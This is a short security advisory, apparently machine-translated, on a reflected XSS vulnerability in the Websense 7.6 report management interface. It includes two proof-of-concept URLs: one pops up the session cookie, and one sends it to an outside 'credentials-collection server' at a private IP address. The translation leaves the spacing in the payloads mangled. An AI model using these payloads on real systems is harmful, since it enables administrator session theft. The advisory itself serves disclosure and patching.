Release date: 2011-12-15
Updated on:
Affected Systems:
Websense Web Security Gateway Anywhere 7.6
Websense Web Filter 7.6
Web Security 7.6
Websense Web Security Gateway 7.6
Description:
--------------------------------------------------------------------------------
Bugtraq id: 51085
Websense is a network filter product. Websense Tron is a content security solution.
Websense (Tron 7.6) Reflection XSS exists in the implementation of the Report Management UI that enables Authentication Session token capture, attackers can access the reporting UI or run arbitrary JavaScript in the Administrator's browser and Websense management UI to steal Cookie authentication creden.
<* Source: Ben Williams
Link: http://www.securityfocus.com/archive/1/520889
Http://packetstormsecurity.org/files/112359/NGS00137-1.txt
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Ben Williams () provides the following test methods:
Https://www.example.com/explorer_wse/detail.exe? C = cat & cat = 153 & anon = & startDate = 2011-10-22 & endDate = 2011-10-22 & session = a434cf98f3a402478599a71495a4a71e & dTitle = Internet_use_by_Category "> <script> alert (document. cookie) </script> & section = 1 & uid = & col = 1 & cor = 1 & explorer = 1 & fork = 1 & puid = 7360
Send the current session-cookies to a credentials-collection server:
Https://www.example.com/explorer_wse/detail.exe? C = cat & cat = 153 & anon = & startDate = 2011-10-22 & endDate = 2011-10-22 & session = a434cf98f3a402478599a71495a4a71e & dTitle = Internet_use_by_Category "> <script> document. location = unescape ("http: // 192.168.1.64/" % 2 bencodeURIComponent (document. cookie) </script> & section = 1 & uid = & col = 1 & cor = 1 & explorer = 1 & fork = 1 & puid = 7360
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Websense
--------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Http://www.websense.com/global/en/